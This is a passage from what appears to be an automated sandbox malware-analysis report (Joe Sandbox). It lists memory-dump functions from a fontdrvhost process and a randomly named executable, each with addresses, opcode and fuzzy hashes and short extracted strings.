Opcode ID: ea7e2bdc7686ae629657b90d082fad6856b9a0518e278cfe6e248faab2468ad5
Instruction ID: ba9835db86403fa88ed01ff0174400902c3c43f130204eabc9fe060ceaff2b70
Opcode Fuzzy Hash: ea7e2bdc7686ae629657b90d082fad6856b9a0518e278cfe6e248faab2468ad5
Instruction Fuzzy Hash: 86015870909A5DCFCF59EBA8C895EACBBB1FF69345F14019DC00AEB261CA71A941DF40

Function 00007FFD9B880C50 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 332bf0a41f1fae592f3ba302e9150512cfa17d9af7455ba1a922510162098f68
Instruction ID: 8209d5228cea2e8380c3c50f8d4275420f55f8197fee9e3fa3c528fee7bb39eb
Opcode Fuzzy Hash: 332bf0a41f1fae592f3ba302e9150512cfa17d9af7455ba1a922510162098f68
Instruction Fuzzy Hash: 33018F31E1EB8D9FE722DBB4886019D7BB0EF16714F1641E3D054DB2A2E9386B448741

Function 00007FFD9B8829D4 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 761e2923b077f2d9600d50a95bc5eded3f37b587bffd50bfc0c14b2e65bdc6d3
Instruction ID: 962eff0d0c97d38953c111d6718577aeca361bb4cf7ceb49db6a33d431c36feb
Opcode Fuzzy Hash: 761e2923b077f2d9600d50a95bc5eded3f37b587bffd50bfc0c14b2e65bdc6d3
Instruction Fuzzy Hash: EBF03630B1991E4FEB74EF94C864AF873A1FF48711F5201B9C49EE31B1DD386A818A40

Function 00007FFD9BC7C082 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b7adad853cc7d37d43a69badf4c8f368a528e2da076fde9eff174bc84e107c6
Instruction ID: d0f5f03359824428358a12034047509888e554b9799f4ffef04809c3d6207eda
Opcode Fuzzy Hash: 4b7adad853cc7d37d43a69badf4c8f368a528e2da076fde9eff174bc84e107c6
Instruction Fuzzy Hash: EAF0963245F3CA9FD3229BB088655DE7FA4EF43211B1900F6D485C70B2D66D561AC791

Function 00007FFD9BC786B8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e157ca892806e3b67b6c232a351b86bc46978a40ef459c591ad974fe1d8de99
Instruction ID: 9518b2f3971c20e21755033005b9861d3f7300ff067767008d4c25fb6e0f169e
Opcode Fuzzy Hash: 5e157ca892806e3b67b6c232a351b86bc46978a40ef459c591ad974fe1d8de99
Instruction Fuzzy Hash: 93F0E91571F54E5FEB7596B195B21FD2B00EF45300F2508BAC74E970F2C908770253A1

Function 00007FFD9BC73308 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a07ddc8de2b102908ac680ce2a2a940877c6647d5857cc5cb07c1ed16527c0d
Instruction ID: 7a6c7df169beb966d928d23f3db2e43249a8a8d6b4b28f58ca1b348e9a905fa2
Opcode Fuzzy Hash: 2a07ddc8de2b102908ac680ce2a2a940877c6647d5857cc5cb07c1ed16527c0d
Instruction Fuzzy Hash: 55F0BE25B0F98E8BEBB646B055B22FD2B50DF81300F2A047AC58E870E2CD0963039382

Function 00007FFD9B882A9A Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 428764437d29e1890ab5c5ac2c1d17129b049794f483ad01c538d826eaafabbb
Instruction ID: 6cdefe82af98f426c240c01dd2a60dab599bccd5c589262d73b9071cb8de7241
Opcode Fuzzy Hash: 428764437d29e1890ab5c5ac2c1d17129b049794f483ad01c538d826eaafabbb
Instruction Fuzzy Hash: CBF0D631B1DC0E4BEA74DF98D864AB92392EF98711F570175D4AEE31B2DD386E414640

Function 00007FFD9BC7CD7A Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36b3307a59a12eec4264341d798aa82fecdfbb74f895b6b92c8370cf817d455e
Instruction ID: dc2bcfa7488137aaf46b63576b29f809d5c51a7d19ab869c8e4c14a876bcce24
Opcode Fuzzy Hash: 36b3307a59a12eec4264341d798aa82fecdfbb74f895b6b92c8370cf817d455e
Instruction Fuzzy Hash: 40F06221A0E38B4FDB235BB84CE15A93F90DF2731071A46BAC454CB1E7D65866058351

Function 00007FFD9B880B77 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55a2d766cbeaa1aefa47f28a70623ac3dc84a67b48b7a99bd370e289017dc901
Instruction ID: 8a5bdb2733e744ec6a4a3f547b6e6cfcb4db4bcd2478ec20c229157afde2c6f3
Opcode Fuzzy Hash: 55a2d766cbeaa1aefa47f28a70623ac3dc84a67b48b7a99bd370e289017dc901
Instruction Fuzzy Hash: 69E0223A608E09CFD700AB39CC948C17B90FB0A61ABAA00AED148C7612E2215828CB44

Function 00007FFD9BC7DA4A Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74fba5540ad5e12431ca79acf25ec2bfd82403f7fd4fb5844775a54d1f68887c
Instruction ID: 5d2a1dcad2e4eec6f4183124f69b874c0546ae2886d6ff6894180abb6a94b8dd
Opcode Fuzzy Hash: 74fba5540ad5e12431ca79acf25ec2bfd82403f7fd4fb5844775a54d1f68887c
Instruction Fuzzy Hash: 2BF02B10B1D99D4ECB59AB7459629FA7B90EF49210F4406BBE18EC70D7CE28B21A93D0

Function 00007FFD9BC7D878 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 402caa23eb78bf53a40c82c019baa3c6c8ca191b856a58b8665ef6dde30079cd
Instruction ID: 76bf7a70e59a4a8cee7b37d7963edcb2be63d35a6d6a25a20d95fb99c2c58738
Opcode Fuzzy Hash: 402caa23eb78bf53a40c82c019baa3c6c8ca191b856a58b8665ef6dde30079cd
Instruction Fuzzy Hash: DDF0E284B0F68E8AE77946FC85F137C2E50DF82310F2A05BAC58E870F6C8197705A291

Function 00007FFD9BC71A5F Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
Instruction ID: 07e05e36d3654a81c545723494d80797128d798d82388cc9637ba8cad9c44e00
Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
Instruction Fuzzy Hash: 5AF0B27490A95C9FCB55EAA8C85AE99BBB0FF68300F10019DD00ADB262CA219945CF40

Function 00007FFD9B8806F2 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf54574ddcc50799ea5c6ca5731293c98964cc92c99a0dd42eeded35e66fb0ef
Instruction ID: f3b280f8b7a9db97261fca7db3118a0f8504802e52f063d057204609ef636f41
Opcode Fuzzy Hash: cf54574ddcc50799ea5c6ca5731293c98964cc92c99a0dd42eeded35e66fb0ef
Instruction Fuzzy Hash: 84E02051D5FB4E0BE61333FD587609D7A141F9A514F9600B3C47D471F3B89E32990652

Function 00007FFD9B886F2A Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caf9769b7db13766396f1f893b08372476b355b1bf395917b3d0e5c4e8990cee
Instruction ID: b5a70a49c87fb26046e825190c62139de24eb986e3a421373c99526ea82fef17
Opcode Fuzzy Hash: caf9769b7db13766396f1f893b08372476b355b1bf395917b3d0e5c4e8990cee
Instruction Fuzzy Hash: 1BE01A20F2A81E4BFB75E794C8707F962A1AF9C700F1600B4D92E932E2DD386F419B40

Function 00007FFD9BC72827 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9a9d42f834fe1a74f0359cab22a3f21fdb7af40720368f1eaf8bb8ea9eca248
Instruction ID: c779603401020045e51fd57917057efc69e05316e0464d944e5babc762c2ea23
Opcode Fuzzy Hash: b9a9d42f834fe1a74f0359cab22a3f21fdb7af40720368f1eaf8bb8ea9eca248
Instruction Fuzzy Hash: 83D01242F0F7894BE77606F408B316C1A50CF2B34075A06BAD5668E2E3D95969055322

Function 00007FFD9BC77BE7 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9fa41ad516edd20d0743218354639571498677c24175f2ad321490b9fb3e0f
Instruction ID: f71927d8b3379b61d841c5a2dcc79fbd03b816279e2fdcf64b7e1de2032a7d11
Opcode Fuzzy Hash: bb9fa41ad516edd20d0743218354639571498677c24175f2ad321490b9fb3e0f
Instruction Fuzzy Hash: 32D01252F1E38E4BFB3606B408B70781A90CF1B2407560DB7D55A8B1E3D94829455322

Function 00007FFD9BC71B5C Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c3584593388bce4205435d600ac602d57c4889d2b2cd539ccbbd81f90dd5b0a
Instruction ID: b9f5400b2d256afbc89b5b667c16fa98429be00934a7f268ed2d5676985724fa
Opcode Fuzzy Hash: 4c3584593388bce4205435d600ac602d57c4889d2b2cd539ccbbd81f90dd5b0a
Instruction Fuzzy Hash: F1D0177591E68D96EB35ABB089A20ECBB64FF40700F1500BAE909030A1EA2427189A82

Function 00007FFD9B8806A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
Instruction ID: c13aefb6d55cf501856f77e6c2bf2a23f1b88277974dd7f49fefe605013e4b9b
Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
Instruction Fuzzy Hash: 54C04C05F6BE1F03F835B7EE98660ACA1405FDDA10FE70172D56D400F19C6E22D50196

Function 00007FFD9B8812E0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dc822a51c0cabe518198916ba3302ac1d1f88faaf127e41e827fa079888f130
Instruction ID: cebd59e7d1bfd1e2b22818736a0133abcdeee54b43ecd42ac06bb63f4d92684a
Opcode Fuzzy Hash: 0dc822a51c0cabe518198916ba3302ac1d1f88faaf127e41e827fa079888f130
Instruction Fuzzy Hash: 05C08C30511C0C8FC908EB28C88480433A0FB0D300BC20090E408C71B0D22ADCC1C780

Function 00007FFD9B880B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e80f6b96130f5d7351ae104d3d6270a63f24a102d3fc2d6494240c327d15f15
Instruction ID: 2557c9ed606ebf0520aff8a5fe2091e7b835b4ce8d971a56c32bcdb955cf0b0e
Opcode Fuzzy Hash: 4e80f6b96130f5d7351ae104d3d6270a63f24a102d3fc2d6494240c327d15f15
Instruction Fuzzy Hash: 4AC08C305118088FC900F72CC98480032A0FB0D210BD20190E00EC7174E22A9C80C700

Function 00007FFD9BC7B0E5 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction ID: 2bc549a28dc6d0f9e818e3624b52157be55f0ea67fbf03ea0921c8b992feb18e
Opcode Fuzzy Hash: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction Fuzzy Hash: 02C04C303048189FD794DA5DC0D463877D1EF49301B5100B4E04ACF2B5C5289D499710

Function 00007FFD9B8850E2 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f6bdf610361c4f4f4b53f4a3e6ec0a008bf9899fbf6d884d6cfd36559dda039
Instruction ID: 7a1a3297d65c938e5e01fa9083517115d412e3f0a6d64e3d3ba03470fe31df27
Opcode Fuzzy Hash: 5f6bdf610361c4f4f4b53f4a3e6ec0a008bf9899fbf6d884d6cfd36559dda039
Instruction Fuzzy Hash: BEC04C04F18C1A07F76A7798587257E44829B48704F950174E02DE77CEDD5C5E0212C7

Function 00007FFD9B884846 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
Instruction ID: 7965264658cb1207071bac2ece0e02941b71958e91d207eb8aa22643e27ff589
Opcode Fuzzy Hash: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
Instruction Fuzzy Hash: D4C09B25E1945D46E73497B0C4253BA72516F5C204F578673406E96091DD3856415540

Function 00007FFD9B8806C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
Instruction ID: 5da5ff76cf65608968526766dc672c9fc2555f591059f30dbc81451b12a4aa0e
Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
Instruction Fuzzy Hash: 3EB01200E67C0F02E42433FA0C9206470405F8D100FC300B0D42D400B1985E22940282

Analysis Process: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exePID: 7072, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B880D48 Relevance: 1.5, Strings: 1, Instructions: 258COMMON

Download Yara Rule

Strings

5[_H, xrefs: 00007FFD9B880DF3

Memory Dump Source

Source File: 00000017.00000002.1887371897.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b880000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID: 5[_H
API String ID: 0-3279724263
Opcode ID: 9b38565e3fc7cc9ad097d0a3800b93aae1301d42a50fda34e52b6100020cf290
Instruction ID: 97128ccbcba32e103bdfb147166b27ad539e40ca5243b1199282659cc5a34905
Opcode Fuzzy Hash: 9b38565e3fc7cc9ad097d0a3800b93aae1301d42a50fda34e52b6100020cf290
Instruction Fuzzy Hash: B091E1B5A19A8D8FEB59DB6C8C657A97FE1FF9A300F4001BAD119C72E6CF7818018710

Function 00007FFD9B880E43 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1887371897.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b880000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7b98cfe10ccfd992c4ec00095566ce3426eb3af43491f265d6211e196ce2498
Instruction ID: 30445c737533680c47599506a52af3b1a9d5c173eb350bf962f2a6818e3510dc
Opcode Fuzzy Hash: d7b98cfe10ccfd992c4ec00095566ce3426eb3af43491f265d6211e196ce2498
Instruction Fuzzy Hash: 9451CFB6A28D498BEB9CDB5C88697A97FE0EB99310F4001BED11AC73D5CF7818128310

Function 00007FFD9B880B3F Relevance: 3.8, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FFD9B880B56
!k9, xrefs: 00007FFD9B880B4E
"s9, xrefs: 00007FFD9B880B46

Memory Dump Source

Source File: 00000017.00000002.1887371897.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b880000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: 964e90bf5b31a5ecb5eb94aa9d1524e360d8db055ca863c69c2fe0ffacba69cf
Instruction ID: 07960ecc945c78fc3916653149dd8474f82545f6b37777317d9bb0e272078288
Opcode Fuzzy Hash: 964e90bf5b31a5ecb5eb94aa9d1524e360d8db055ca863c69c2fe0ffacba69cf
Instruction Fuzzy Hash: F6F0F43B728D0A8BC7016B3EB8805D57780EBD9636BD505BBD204CB261E2201C9E83E0

Function 00007FFD9B8B0515 Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9B8B04C6

Memory Dump Source

Source File: 00000017.00000002.1887371897.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 29da4b82ffc331327ae2990cbea34ad9eefb760b440755561446b5ef22a08a24
Instruction ID: a5cf72a23167dbb78e61765d43a93f83e75194165e8af2dab7782b80377dedc5
Opcode Fuzzy Hash: 29da4b82ffc331327ae2990cbea34ad9eefb760b440755561446b5ef22a08a24
Instruction Fuzzy Hash: FAF0E07094F3D55FCB15A775485D8547F60EF5720174941FEC086CF163D91D8886C741

Function 00007FFD9B8B9F89 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9B8B9FA6

Memory Dump Source

Source File: 00000017.00000002.1887371897.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 230ba97b0b267c4b1448ca7cb140bfb97baa36aa3d2ee4e1f326e0de125a30d3
Instruction ID: 59b73eac71e4658cb361c0ad03428d5a4707f72b87d10aa4f365f8c4d0516b4e
Opcode Fuzzy Hash: 230ba97b0b267c4b1448ca7cb140bfb97baa36aa3d2ee4e1f326e0de125a30d3
Instruction Fuzzy Hash: A2F0E57050F7C44FC71A9A7488288147FA0EF2720074A42EFC045CF1A3EA2CC889CB01

Function 00007FFD9B8B2A09 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9B8B2A26

Memory Dump Source

Source File: 00000017.00000002.1887371897.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: d141e697d6f082d1976ef2c85797beeeaf8c75f1533f7d34af21a63e8fcb698e
Instruction ID: 9731f67db491e75c8e49096a1311ee9fad004608a2c76cb669192b87f15f4a78
Opcode Fuzzy Hash: d141e697d6f082d1976ef2c85797beeeaf8c75f1533f7d34af21a63e8fcb698e
Instruction Fuzzy Hash: 3FF0A02060F3C44FC716DA7888298057FA0AF6721134A52EEC045CF1A3EA1C9885C701

Function 00007FFD9B8B9EF9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9B8B9F16

Memory Dump Source

Source File: 00000017.00000002.1887371897.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 3837b88d7eebc642db5f9453ee1ac5a0a1a89f90fb5f6f431c5185038c33e48e
Instruction ID: 927e6cea1e00704e74e5d893fdea8012cf0829493879b4d31f9b11d4055e05f7
Opcode Fuzzy Hash: 3837b88d7eebc642db5f9453ee1ac5a0a1a89f90fb5f6f431c5185038c33e48e
Instruction Fuzzy Hash: E9E0396160E7C44FC71AAA748869854BFA0AF6721174A42EFC045CB1A3EA298889CB01

Function 00007FFD9B8B04A9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9B8B04C6

Memory Dump Source

Source File: 00000017.00000002.1887371897.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 44f88ba1d28b81a93ddcbe450e117c632d18a26d61e53cf0085b933eccb8a6a8
Instruction ID: 036efaeffd31da5ebfd7d8ba846ad5c548a5ddf1eee4b548b8123d3fc34fc245
Opcode Fuzzy Hash: 44f88ba1d28b81a93ddcbe450e117c632d18a26d61e53cf0085b933eccb8a6a8
Instruction Fuzzy Hash: 2CE09B7154F7C44FC716D73488694547FA0EF6720574A51EEC085CF1A3DA1DD849CB01

Function 00007FFD9B8B7BC9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9B8B7BE6

Memory Dump Source

Source File: 00000017.00000002.1887371897.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 04133ecd0354231a20ccade490174bc175ff4fb36702536d1dfbfc203bc83545
Instruction ID: 5425b3b6eac58616cc648ebc450680d093638a67af1d4fe8a11b3dc7bf50c9a3
Opcode Fuzzy Hash: 04133ecd0354231a20ccade490174bc175ff4fb36702536d1dfbfc203bc83545
Instruction Fuzzy Hash: 43E01A7154F3D44FCB16EB7988698453FA0AE6B21178B41EEC085CF1B3E62DD849CB11

Function 00007FFD9B8BA4C9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9B8BA4E6

Memory Dump Source

Source File: 00000017.00000002.1887371897.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 9faf197dc62911d0a7af2aa7722b618369f20d2d8d882603d4d3e7e0781d5d37
Instruction ID: 97b904ebf30643815ebf4f859ecb67a4548ca23f12e68e3c1893d58265ce78dc
Opcode Fuzzy Hash: 9faf197dc62911d0a7af2aa7722b618369f20d2d8d882603d4d3e7e0781d5d37
Instruction Fuzzy Hash: 42E0E5B194F3D44FCB1AAB7488698547FA0AE6B21078A41EEC189CB1B3E62D9849C701

Function 00007FFD9B88090D Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

